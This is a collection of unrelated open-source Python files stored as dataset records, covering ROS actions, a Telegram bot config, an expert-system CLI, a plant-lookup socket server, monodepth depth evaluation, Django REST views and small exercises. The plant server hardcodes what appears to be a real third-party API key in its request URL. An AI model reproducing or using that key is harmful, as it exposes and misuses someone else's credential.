get_ci_value('REMOTE_WORK_DIR'),\n}\n","repo_name":"firesim/firesim","sub_path":".github/scripts/ci_variables.py","file_name":"ci_variables.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":761,"dataset":"github-code","pt":"19"}
{"seq_id":"72694177003","text":"#!/usr/bin/env python3\n\nimport rospy\nimport actionlib\n\nfrom my_robot_msgs.msg import num_actionAction\nfrom my_robot_msgs.msg import num_actionGoal\nfrom my_robot_msgs.msg import 
num_actionResult\nfrom my_robot_msgs.msg import num_actionFeedback\n\nfrom my_robot_msgs.msg import action_csAction\nfrom my_robot_msgs.msg import action_csGoal\n\nclass sas_action_client:\n    def __init__(self):\n        self.increase = 10\n        self.sas = actionlib.SimpleActionServer(\"/num_sac\",num_actionAction,execute_cb=self.on_goal,auto_start=False)\n        self.sas.start()\n        rospy.loginfo(\"Simple Action server has been started\")\n        self._ac = actionlib.ActionClient(\"/numActionClient\",action_csAction)\n        rospy.loginfo(\"Waiting for Action server\")\n        \n        self._ac.wait_for_server()\n    \n    def on_goal(self,goal):\n        rospy.loginfo(\"Goal received\")\n        rospy.loginfo(goal)\n        rate = rospy.Rate(1)\n        cnt = 0\n        number = goal.bin_num\n        while not cnt == self.increase:\n            cnt += 1\n            number += cnt\n            percent = (cnt/(self.increase)) * 100\n            feedb = num_actionFeedback()\n            feedb.percentage_done = percent\n            self.sas.publish_feedback(feedb)\n            rate.sleep()\n        \n        res = num_actionResult()\n        res.number = bin(number)[2:]\n        self.sas.set_succeeded(res)\n        rospy.loginfo(\"Result has been sent\") \n\n    def send_goal(self):\n        goal = action_csGoal()\n        goal.num = self.increase\n        goal_handle = self._ac.send_goal(goal,transition_cb=self.trans_callback,feedback_cb=self.feedb)\n        return goal_handle\n\n    def trans_callback(self,goal_handle):\n        if goal_handle.get_comm_state() == 2:\n            rospy.loginfo(\"Goal just went active\")\n        if goal_handle.get_comm_state() == 7:\n            rospy.loginfo(\"Goal is Done\")\n            rospy.loginfo(goal_handle.get_terminal_state())\n            rospy.loginfo(goal_handle.get_result())\n    \n    \n    def feedb(self,goal_handle,feedback):\n        rospy.loginfo(goal_handle)\n        rospy.loginfo(feedback)\n\n\nif __name__ == \"__main__\":\n    rospy.init_node(\"num_sas_and_action_client\")\n    rospy.loginfo(\"Number SAS and Action Client has been initiated\")\n    sas = sas_action_client()\n    sas.send_goal()\n    rospy.spin()\n    ","repo_name":"GOLISHYAMP/ROS_prac","sub_path":"prac_ros_ws/src/my_robot_codes/scripts/number_sas_and_action_client.py","file_name":"number_sas_and_action_client.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"21722307281","text":"# Types\nType_Groups = 'group', 'supergroup'\nType_Private = 'private'\nType_Restricted = 'restricted', 'left', 'kicked'\nType_Admins = 'creator', 'administrator'\nType_Creator = 'creator'\n\n# Variables\nToken = ''\nMainID = 0\nDefault_Language = ''\nLog_Path = 'Files\\\\Main.log'\nLog_Format = '%(asctime)s - %(name)s - %(levelname)s -> %(message)s'\n\n# Activities\nText = False\nAVNV = False\nDoc = False\nPhoto = False\nSticker = False\nLC = False\nNCM = False\nLCM = False\nNCT = False\n\n# Templates\nSearch = Type_Private + Type_Groups\nMenu = Type_Private\n\nSearch_Allowed = True\nMenu_Allowed = True\n","repo_name":"ParzivalllUser/EsmTorresBot","sub_path":"libs/Constant_Example.py","file_name":"Constant_Example.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"18653810833","text":"from colorama import Fore, Back, Style\nfrom os import getenv\nfrom sys import argv\nimport readline\n\nfrom expert_system import ExpertSystem\n\ndef terminate_with_usage():\n\tprint(Style.BRIGHT + 'usage: ' + Style.RESET_ALL)\n\tprint('python3 ' + Fore.BLUE + 'main.py ' + Fore.RESET + '-h \\t\\t\\t (usage)')\n\tprint('python3 ' + Fore.BLUE + 'main.py ' + Fore.RESET + '\\t\\t\\t (start interactive session)')\n\tprint('python3 
' + Fore.BLUE + 'main.py ' + Fore.RESET + '-f ' + Fore.CYAN + 'filename' + Fore.RESET +\n\t\t'\\t\\t (process input file)')\n\tprint()\n\n\tprint(Style.BRIGHT + '[COMMANDS]' + Style.RESET_ALL)\n\tprint(Fore.BLUE + '@info' + Fore.RESET + \"\\t\\t\\t Display all rules and facts\")\n\tprint(Fore.BLUE + '@del index' + Fore.RESET + \"\\t\\t Delete rule at index\")\n\tprint(Fore.BLUE + '@verbose on|off' + Fore.RESET + \"\\t\\t Toggle verbose\")\n\tprint(Fore.BLUE + '@vis' + Fore.RESET + \"\\t\\t\\t Produce a complete graph pdf file\")\n\tprint(Fore.BLUE + '@reset' + Fore.RESET + \"\\t\\t\\t Reset the system\")\n\tprint(Fore.BLUE + '@dance' + Fore.RESET + '\\t\\t\\t ¯\\\\_(ツ)_/¯')\n\tprint(Fore.BLUE + '@doge' + Fore.RESET + '\\t\\t\\t ¯\\\\_(ツ)_/¯')\n\tquit()\n\ndef interactive_loop(expert_system):\n\tprompt = getenv('ES_PROMPT')\n\tif prompt is None or prompt == '':\n\t\tprompt = '🍔 Enter statement: '\n\twhile True:\n\t\tprint()\n\t\tstatement = input(prompt).strip()\n\t\tif statement.upper() == 'EXIT':\n\t\t\tbreak\n\t\texpert_system.process_statement(statement)\n\ndef process_file(expert_system, filename):\n\twith open(filename, 'r') as file:\n\t\tfor line in file:\n\t\t\tstatement = line.strip()\n\t\t\tif statement == '' or statement[0] == '#':\n\t\t\t\tprint(Fore.MAGENTA + statement + Fore.RESET)\n\t\t\telse:\n\t\t\t\texpert_system.process_statement(statement)\n\ndef main():\n\ttry:\n\t\texpert_system = ExpertSystem()\n\n\t\t# Interactive mode\n\t\tif len(argv) == 1:\n\t\t\tinteractive_loop(expert_system)\n\t\t# Usage mode\n\t\telif argv[1] == '-h':\n\t\t\tterminate_with_usage()\n\t\t# File-processing mode\n\t\telif argv[1] == '-f':\n\t\t\tif len(argv) != 3:\n\t\t\t\tterminate_with_usage()\n\t\t\tfilename = argv[2]\n\t\t\tprocess_file(expert_system, filename)\n\t\t# Nope mode\n\t\telse:\n\t\t\tterminate_with_usage()\n\texcept IOError as e:\n\t\tprint(Style.BRIGHT + Fore.RED + 'I/O Error: ' + Style.RESET_ALL + Fore.RESET + str(e))\n\texcept EOFError as e:\n\t\tpass\n\nif __name__ == '__main__':\n\tmain()\n\n","repo_name":"ashih42/expert_system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"37441620697","text":"import socket\nfrom urllib.request import urlopen\nimport json\n\nurl = \"https://perenual.com/api/species-list?key=sk-yL9564c874f236cf61720&page=1\"\n\nresponse = urlopen(url)\n\ndata = json.loads(response.read())\n\n\nport = 1800\nhost = '127.0.0.1'\naddress = (host, port)\n\nserverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserverSocket.bind(address)\n\nserverSocket.listen(1)\n\nconn, addr = serverSocket.accept()\n\nwhile True:\n    input_name = conn.recv(1024).decode()\n    save_plant = None\n    message = 'false'\n    for x in data[\"data\"]:\n        if x[\"common_name\"].lower() == input_name.lower() or x[\"scientific_name\"].lower() == input_name.lower():\n            save_plant = x\n            message = 'true'\n            break\n\n    conn.send(message.encode())\n\n    if message == 'false':\n        continue\n\n    message = conn.recv(1024).decode()\n\n    if message == '1':\n        response = save_plant[\"scientific_name\"]\n    elif message == '2':\n        response = save_plant[\"watering\"]\n    elif message == '3':\n        response = save_plant[\"sunlight\"]\n    elif message == '4':\n        response = save_plant[\"cycle\"]\n\n    # for i in range(len(data[\"data\"])):\n    #     if data[\"data\"][i][\"common_name\"] == message.lower():\n    #         plant_info = 
f'Scientific Name: {data[\"data\"][i][\"scientific_name\"]}\\nWatering: {data[\"data\"][i][\"watering\"]}\\nSunlight: {data[\"data\"][i][\"sunlight\"]}\\nCycle: {data[\"data\"][i][\"cycle\"]}\\n'\n # response = plant_info\n # else:\n # response = \"Plant may not be in database. Check for spelling!\"\n\n\n # Send message to the client\n conn.send(str(response).encode())\n\n# Close sockets\nconn.close() # Close new socket\nserverSocket.close() # Close serverSocket\n","repo_name":"Jesus-Palapa/PortfolioProject361","sub_path":"plant_partner.py","file_name":"plant_partner.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15009164800","text":"#average temperature calculation\n\nnumDays = int(input('Please specify for how many days the temperatures to be taken:'))\n\ntemp=[]\ntotal=0\n\nfor i in range(0,numDays):\n temp1=int(input(f\"day's {i+1} temperature:\"))\n temp.append(temp1)\n total+=temp1\n\naverage_temp=round((sum(temp)/len(temp)),2)\nprint(f\"average: {average_temp}\")\n\ncount=[i for i in temp if i>average_temp]\n\nprint(f\"the no of days which have greater tempature than the average temperature: {len(count)}\")","repo_name":"saiharshithpalepu/DSA","sub_path":"Lists/average_temperature.py","file_name":"average_temperature.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70388989483","text":"import re, os\n\nids=[]\ndoc=input(\"enter document name here:\")\nwith open (\"C:\\\\Users\\\\USER\\\\Downloads\\\\\"+ doc)as f:\n for line in f:\n if \"TRACE\"not in line:\n continue\n pattern=r\"\\d+$\"\n pattern2=r\"^\\d\\d\\d\\d-\\d\\d-\\d\\d \"\n word=re.search(pattern,line).group(0)\n match=re.search(pattern2,line).group(0)\n words=f\"ids:{word} and date is :{match}\"\n print(words)\n \n \n","repo_name":"EmperorDa8/random-scripts","sub_path":"syslogfile.py","file_name":"syslogfile.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72343867243","text":"import rasterio\n\ndef get_geo_ref_points_tiff_path(tiff_path):\n ds = rasterio.open(tiff_path)\n minx = ds.bounds.left\n maxx = ds.bounds.right\n miny = ds.bounds.bottom\n maxy = ds.bounds.top\n return {\n 'ul': {'x': minx, 'y': maxy}, \n 'ur': {'x': maxx, 'y': maxy},\n 'll': {'x': minx, 'y': miny}, \n 'lr': {'x': maxx, 'y': miny}\n }\n\ndef get_geo_ref_points_info_landsat_c1_l2(info):\n return {\n 'ul': {'x': info['CORNER_UL_PROJECTION_X_PRODUCT'], 'y': info['CORNER_UL_PROJECTION_Y_PRODUCT']},\n 'ur': {'x': info['CORNER_UR_PROJECTION_X_PRODUCT'], 'y': info['CORNER_UR_PROJECTION_Y_PRODUCT']},\n 'll': {'x': info['CORNER_LL_PROJECTION_X_PRODUCT'], 'y': info['CORNER_LL_PROJECTION_Y_PRODUCT']},\n 'lr': {'x': info['CORNER_LR_PROJECTION_X_PRODUCT'], 'y': info['CORNER_LR_PROJECTION_Y_PRODUCT']},\n }","repo_name":"ceos-seo/odc_manual_indexer","sub_path":"utils/get_geo_ref_points.py","file_name":"get_geo_ref_points.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"27348452874","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nfrom cv2 import cv2\nimport numpy as np\n\nimport torch\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\n\nfrom layers import disp_to_depth\nfrom 
utils import readlines, printc\nfrom options import MonodepthOptions\nimport datasets\nimport networks\n\nfrom tqdm import tqdm\nimport PIL.Image as pil\nimport time\n\ncv2.setNumThreads(\n 0) # This speeds up evaluation 5x on our unix systems (OpenCV 3.3.1)\n\nsplits_dir = os.path.join(os.path.dirname(__file__), \"splits\")\n\n# Models which were trained with stereo supervision were trained with a nominal\n# baseline of 0.1 units. The KITTI rig has a baseline of 54cm. Therefore,\n# to convert our stereo predictions to real-world scale we multiply our depths by 5.4.\nSTEREO_SCALE_FACTOR = 5.4\n\n\ndef set_lr(optimizer, lr):\n for g in optimizer.param_groups:\n g['lr'] = lr\n\n\ndef optimize_with_lidar(opt, encoder, depth_decoder, data):\n params = []\n for _, param in encoder.named_parameters():\n if param.requires_grad:\n params.append(param)\n for _, param in depth_decoder.named_parameters():\n if param.requires_grad:\n params.append(param)\n optimizer = torch.optim.Adam(params, lr=opt.learning_rate)\n prev_loss = 0\n\n input_color = data[(\"color\", 0, 0)].cuda()\n input_lidar = data[(\"lidar\", 0, 0)].cuda()\n if opt.sparse:\n input_data = torch.cat((input_color, input_lidar), 1)\n else:\n input_data = input_color\n for idx_iter in range(opt.num_iters):\n output = depth_decoder(encoder(input_data))\n loss = 0\n # if idx_iter <= 10:\n # set_lr(optimizer, opt.learning_rate * (idx_iter + 1) / 10)\n if -1 in opt.scales:\n height, width = data[(\"lidar\", 0, -1)].shape[2:]\n output['disp', -1] = F.interpolate(output['disp', 0],\n [height, width],\n mode=\"bilinear\",\n align_corners=False)\n for scale in opt.scales:\n lidar = data[(\"lidar\", 0, scale)].cuda() * 80\n disp = output[(\"disp\", scale)]\n mask = lidar > 0\n _, pred = disp_to_depth(disp, opt.min_depth, opt.max_depth)\n selected_pred = pred[mask]\n selected_lidar = lidar[mask]\n if opt.median_scaling:\n ratio = float((selected_lidar / selected_pred).median())\n selected_pred *= ratio\n loss += ((selected_lidar - selected_pred)**2).mean()\n # print(loss)\n # if abs(prev_loss - loss) / loss < 1e-2:\n # break\n prev_loss = float(loss)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return depth_decoder(encoder(input_data))\n\n\ndef compute_errors(gt, pred):\n \"\"\"Computation of error metrics between predicted and ground truth depths\n \"\"\"\n thresh = np.maximum((gt / pred), (pred / gt))\n a1 = (thresh < 1.25).mean()\n a2 = (thresh < 1.25**2).mean()\n a3 = (thresh < 1.25**3).mean()\n\n rmse = (gt - pred)**2\n # [m] to [mm]\n rmse = np.sqrt(rmse[gt.nonzero()].mean()) * 1000\n mae = np.abs(gt - pred)[gt.nonzero()].mean() * 1000\n\n return rmse, mae, a1, a2, a3\n\n\ndef batch_post_process_disparity(l_disp, r_disp):\n \"\"\"Apply the disparity post-processing method as introduced in Monodepthv1\n \"\"\"\n _, h, w = l_disp.shape\n m_disp = 0.5 * (l_disp + r_disp)\n l, _ = np.meshgrid(np.linspace(0, 1, w), np.linspace(0, 1, h))\n l_mask = (1.0 - np.clip(20 * (l - 0.05), 0, 1))[None, ...]\n r_mask = l_mask[:, :, ::-1]\n return r_mask * l_disp + l_mask * r_disp + (1.0 - l_mask - r_mask) * m_disp\n\n\ndef evaluate(opt):\n \"\"\"Evaluates a pretrained model using a specified test set\n \"\"\"\n MIN_DEPTH = 1e-3\n MAX_DEPTH = 80\n opt.eval_split = 'completion'\n opt.eval_mono = 1\n opt.eval_stereo = 0\n\n opt.load_weights_folder = os.path.expanduser(opt.load_weights_folder)\n filenames = readlines(\n os.path.join(splits_dir, opt.eval_split, \"test_files.txt\"))\n gt_path = os.path.join(splits_dir, opt.eval_split, 
\"gt_depths.npz\")\n gt_depths = np.load(gt_path,\n fix_imports=True,\n encoding='latin1',\n allow_pickle=True)[\"data\"]\n if opt.ext_disp_to_eval is None:\n assert os.path.isdir(opt.load_weights_folder), \\\n \"Cannot find a folder at {}\".format(opt.load_weights_folder)\n\n print(\"-> Loading weights from {}\".format(opt.load_weights_folder))\n\n encoder_path = os.path.join(opt.load_weights_folder, \"encoder.pth\")\n decoder_path = os.path.join(opt.load_weights_folder, \"depth.pth\")\n\n encoder_dict = torch.load(encoder_path)\n\n print(opt.eval_split)\n dataset = datasets.KITTIDepthDataset(opt.data_path,\n filenames,\n encoder_dict['height'],\n encoder_dict['width'], [0],\n 4,\n is_train=False,\n img_ext='.png')\n dataloader = DataLoader(dataset,\n opt.batch_size,\n shuffle=False,\n num_workers=opt.num_workers,\n pin_memory=True,\n drop_last=False)\n\n encoder = networks.ResnetEncoder(opt.num_layers,\n False,\n sparse=opt.sparse)\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc,\n sparse=opt.sparse)\n\n model_dict = encoder.state_dict()\n\n encoder_state = {\n k.replace('module.', ''): v\n for k, v in encoder_dict.items()\n if k.replace('module.', '') in model_dict\n }\n encoder.load_state_dict(encoder_state)\n decoder_state = torch.load(decoder_path)\n decoder_state = {\n k.replace('module.', ''): v for k, v in decoder_state.items()\n }\n depth_decoder.load_state_dict(decoder_state)\n\n encoder.cuda()\n encoder.eval()\n depth_decoder.cuda()\n depth_decoder.eval()\n\n pred_disps = []\n\n print(\"-> Computing predictions with size {}x{}\".format(\n encoder_dict['width'], encoder_dict['height']))\n model_info = 'with' if opt.sparse else 'without'\n print(\"-> Model {} lidar input.\".format(model_info))\n\n if opt.batch_size > 1:\n iterator = tqdm(dataloader)\n else:\n iterator = dataloader\n for idx, data in enumerate(iterator):\n if opt.optimize:\n encoder.load_state_dict(encoder_state)\n depth_decoder.load_state_dict(decoder_state)\n output = optimize_with_lidar(opt, encoder, depth_decoder, data)\n else:\n input_color = data[(\"color\", 0, 0)].cuda()\n input_lidar = data[(\"lidar\", 0, 0)].cuda()\n if opt.post_process:\n # Post-processed results require each image to have two forward passes\n input_color = torch.cat(\n (input_color, torch.flip(input_color, [3])), 0)\n if opt.sparse:\n input_data = torch.cat((input_color, input_lidar), 1)\n else:\n input_data = input_color\n output = depth_decoder(encoder(input_data))\n\n if opt.sparse:\n # pred_disp = output[(\"disp\", 0)].cpu()[:, 0].numpy()\n pred_disp, pred_depth = disp_to_depth(output[(\"disp\", 0)],\n opt.min_depth,\n opt.max_depth)\n else:\n pred_disp, pred_depth = disp_to_depth(output[(\"disp\", 0)],\n opt.min_depth,\n opt.max_depth)\n pred_disp = pred_disp.detach().cpu()[:, 0].numpy()\n pred_depth = pred_depth.detach().cpu()[0, 0].numpy()\n\n if opt.batch_size == 1:\n if opt.median_scaling:\n lidar = data[(\"lidar\", 0, 0)][0, 0] * 80\n mask = lidar > 0\n ratio = float((lidar[mask] / pred_depth[mask]).median())\n pred_depth *= ratio\n # gt_depth = gt_depths[idx]\n gt_depth = data[\"depth_gt\"][0, 0].numpy()\n gt_height, gt_width = gt_depth.shape[:2]\n pred_depth = cv2.resize(pred_depth, (gt_width, gt_height))\n pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH\n pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH\n mask = gt_depth > 0\n pred_depth = pred_depth[mask]\n gt_depth = gt_depth[mask]\n print('[{}]'.format(idx), compute_errors(gt_depth, pred_depth))\n\n if opt.post_process:\n N = pred_disp.shape[0] // 2\n pred_disp = 
batch_post_process_disparity(\n pred_disp[:N], pred_disp[N:, :, ::-1])\n\n pred_disps.append(pred_disp)\n\n pred_disps = np.concatenate(pred_disps)\n\n else:\n # Load predictions from file\n print(\"-> Loading predictions from {}\".format(opt.ext_disp_to_eval))\n pred_disps = np.load(opt.ext_disp_to_eval)\n\n if opt.eval_eigen_to_benchmark:\n eigen_to_benchmark_ids = np.load(\n os.path.join(splits_dir, \"benchmark\",\n \"eigen_to_benchmark_ids.npy\"))\n\n pred_disps = pred_disps[eigen_to_benchmark_ids]\n\n if opt.ext_disp_to_eval is None and opt.save_pred_disps:\n output_path = os.path.join(opt.load_weights_folder,\n \"disps_{}_split.npy\".format(opt.eval_split))\n print(\"-> Saving predicted disparities to \", output_path)\n np.save(output_path, pred_disps)\n\n if opt.no_eval:\n print(\"-> Evaluation disabled. Done.\")\n quit()\n\n elif opt.ext_disp_to_eval is None and opt.eval_split in [\n 'benchmark', 'completion'\n ]:\n save_dir = os.path.join(opt.load_weights_folder,\n \"benchmark_predictions\")\n print(\"-> Saving out benchmark predictions to {}\".format(save_dir))\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n for idx in range(len(pred_disps)):\n disp_resized = cv2.resize(pred_disps[idx], (1216, 352))\n depth = STEREO_SCALE_FACTOR / disp_resized\n depth = np.clip(depth, 0, 80)\n depth = np.uint16(depth * 256)\n save_path = os.path.join(save_dir, \"{:010d}.png\".format(idx))\n cv2.imwrite(save_path, depth)\n\n print(\" Mono evaluation - {} using median scaling\".format(\n \"\" if opt.median_scaling else \"not\"))\n\n errors = []\n ratios = []\n stds = []\n\n side_map = {\"2\": '2', \"3\": '3', \"l\": '2', \"r\": '3'}\n for i in range(pred_disps.shape[0]):\n\n # Get projected velodyne depth\n folder, frame_id, side = filenames[i].split()\n frame_id = int(frame_id)\n velodyne_path = os.path.join(opt.data_path, folder, \"proj_depth\",\n \"velodyne_raw\", \"image_0\" + side_map[side],\n \"{:010d}.png\".format(frame_id))\n\n velodyne_depth = cv2.imread(velodyne_path, cv2.IMREAD_ANYDEPTH).astype(\n np.float32) / 256\n velodyne_mask = velodyne_depth > 1e-7\n mask_idx = velodyne_mask.nonzero()\n\n gt_depth = gt_depths[i]\n gt_height, gt_width = gt_depth.shape[:2]\n\n pred_disp = pred_disps[i]\n pred_disp = cv2.resize(pred_disp, (gt_width, gt_height))\n if opt.sparse:\n # pred_depth = pred_disp\n pred_depth = 1 / pred_disp\n else:\n pred_depth = 1 / pred_disp\n mask = gt_depth > 0\n\n pred_depth *= opt.pred_depth_scale_factor\n # Calc ratios\n ratio_image = velodyne_depth[velodyne_mask] / pred_depth[velodyne_mask]\n ratio = ratio_image.mean()\n stds.append(np.std(ratio_image))\n\n ratios.append(ratio)\n if opt.median_scaling:\n pred_depth *= ratio\n\n pred_depth = pred_depth[mask]\n gt_depth = gt_depth[mask]\n\n pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH\n pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH\n\n errors.append(compute_errors(gt_depth, pred_depth))\n\n stds = np.array(stds)\n print('std in single image | max: {:.3f}, min: {:.3f}'.format(\n np.max(stds), np.min(stds)))\n\n ratios = np.array(ratios)\n med = np.median(ratios)\n print(\n \" Scaling ratios | min: {:.3f} | max: {:.3f} | med: {:0.3f} | std: {:0.3f}\"\n .format(ratios.min(), ratios.max(), med, np.std(ratios)))\n\n mean_errors = np.array(errors).mean(0)\n\n print(\"\\n| \" + (\"{:>8} | \" * 5).format(\"rmse\", \"mae\", \"a1\", \"a2\", \"a3\"))\n print((\"| {:8.3f} \" * 5).format(*mean_errors.tolist()) + \"\\\\\\\\\")\n print(\"\\n-> Done!\")\n\n\nif __name__ == \"__main__\":\n options = 
MonodepthOptions()\n evaluate(options.parse())\n","repo_name":"Dai-z/monodepth2","sub_path":"evaluate_depth_completion.py","file_name":"evaluate_depth_completion.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"22704560777","text":"#\n# @lc app=leetcode id=538 lang=python3\n#\n# [538] Convert BST to Greater Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom typing import Optional\nfrom TreeNode import *\n\n\nclass Solution:\n def convertBST(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n def dfs(cur: TreeNode, from_parent: int) -> TreeNode:\n if not cur:\n return 0\n \n if cur.right:\n right = dfs(cur.right, from_parent)\n cur.val += right\n else:\n cur.val += from_parent\n \n if cur.left:\n left = dfs(cur.left, cur.val)\n return left\n return cur.val\n\n dfs(root, 0)\n return root\n\n \n# @lc code=end\nsolution = Solution()\ntree = deserialize(\"[4,1,6,0,2,5,7,null,null,null,3,null,null,null,8]\")\nprintTree(tree)\nprint(\"\")\nprintTree(solution.convertBST(tree))\n","repo_name":"Real1236/LeetcodePython","sub_path":"leetcode/editor/en/538.convert-bst-to-greater-tree.py","file_name":"538.convert-bst-to-greater-tree.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14644634735","text":"from . import models, serializers, permissions, filters\nfrom rest_framework import generics\nfrom rest_framework import permissions as rest_permissions\nfrom rest_framework import filters as rest_filters\nimport django_filters\n\n\nclass UserList(generics.ListCreateAPIView):\n queryset = models.User.objects.all()\n serializer_class = serializers.UserSerializer\n\n\nclass UserDetail(generics.RetrieveUpdateAPIView):\n queryset = models.User.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsSelfOrReadOnlyUser)\n serializer_class = serializers.UserSerializer\n\n\nclass ClubList(generics.ListCreateAPIView):\n queryset = models.Club.objects.all()\n serializer_class = serializers.ClubSerializer\n permission_classes = (rest_permissions.IsAuthenticated,\n rest_permissions.DjangoModelPermissions)\n filter_backends = (rest_filters.SearchFilter,\n filters.MyClubsFilterBackend)\n search_fields = ('name',)\n\n\nclass ClubDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Club.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsSecyOrRepOrReadOnlyClub)\n serializer_class = serializers.ClubDetailSerializer\n\n\nclass ClubRoleList(generics.ListCreateAPIView):\n queryset = models.ClubRole.objects.all()\n serializer_class = serializers.ClubRoleSerializer\n filter_backends = (filters.MyClubRolesFilterBackend,)\n\n\nclass ClubRoleDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.ClubRole.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsRepClubRole)\n serializer_class = serializers.ClubRoleSerializer\n\n\nclass ChannelList(generics.ListAPIView):\n queryset = models.Channel.objects.all()\n serializer_class = serializers.ChannelSerializer\n\n\nclass ChannelDetail(generics.RetrieveUpdateAPIView):\n queryset = models.Channel.objects.all()\n serializer_class = serializers.ChannelSerializer\n\n\nclass 
PostList(generics.ListCreateAPIView):\n serializer_class = serializers.PostSerializer\n\n def get_queryset(self):\n \"\"\"\n This view should return a list of all the posts for channels subscribed by the user.\n \"\"\"\n return models.Post.objects.filter(channel__subscribers__id__contains=self.request.user.id)\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Post.objects.all()\n serializer_class = serializers.PostSerializer\n\n\nclass ConversationList(generics.ListCreateAPIView):\n serializer_class = serializers.ConversationSerializer\n\n def get_queryset(self):\n \"\"\"\n This view should return a list of all the conversations for channels subscribed by the user.\n \"\"\"\n return models.Conversation.objects.filter(channel__club__roles__members__id__contains=self.request.user.id)\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass ConversationDetail(generics.RetrieveAPIView):\n queryset = models.Conversation.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsClubMemberReadOnlyPost)\n serializer_class = serializers.ConversationSerializer\n\n\nclass ProjectList(generics.ListCreateAPIView):\n queryset = models.Project.objects.all()\n serializer_class = serializers.ProjectSerializer\n\n\nclass ProjectDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Project.objects.all()\n serializer_class = serializers.ProjectSerializer\n\n\nclass FeedbackList(generics.ListCreateAPIView):\n queryset = models.Feedback.objects.all()\n serializer_class = serializers.FeedbackSerializer\n\n\nclass FeedbackDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Feedback.objects.all()\n serializer_class = serializers.FeedbackSerializer\n\n\nclass FeedbackReplyList(generics.ListCreateAPIView):\n queryset = models.FeedbackReply.objects.all()\n serializer_class = serializers.FeedbackReplySerializer\n\n\nclass FeedbackReplyDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.FeedbackReply.objects.all()\n serializer_class = serializers.FeedbackReplySerializer\n","repo_name":"Pratik-Chhajer/clubnet","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"3069492030","text":"import random\nimport math\nimport argparse\nimport os\nfrom scipy.io.wavfile import write\nimport csv\nimport numpy as np\n\ndef get_args():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--length\", type=float, dest=\"length\", default=1.0, help=\"length of each sample in seconds\")\n\tparser.add_argument(\"--size\", type=int, dest=\"size\", default=150)\n\tparser.add_argument(\"--out_dir\", type=str, dest=\"out_dir\", default=\"../data\")\n\tparser.add_argument(\"--wav_dir\", type=str, dest=\"wav_dir\", default=\"../data/wav_files\")\n\tparser.add_argument(\"--sample_rate\", type=int, dest=\"sample_rate\", default=44100)\n\targs = parser.parse_args()\n\tprint(f\"RUN: {vars(args)}\")\n\treturn args\n\ndef generate_sine(sample_rate, length, params):\n\tnum_samples = int(sample_rate*length)\n\tdata = np.zeros(num_samples)\n\tfor i in range(num_samples):\n\t\tt = float(i) / sample_rate\n\t\tv = ((params[\"a1\"] * math.sin(t * params[\"f1\"] * math.pi)) + (params[\"a2\"] * math.sin(t * params[\"f2\"] * math.pi))) * 0.5\n\t\tdata[i] = v\n\n\t# normalization: scale the whole signal once, after synthesis;\n\t# normalizing each sample by its own magnitude (as before) would\n\t# flatten every non-zero sample to +/-1\n\tpeak = np.max(np.absolute(data))\n\tif peak > 0:\n\t\tdata = data / peak\n\n\treturn 
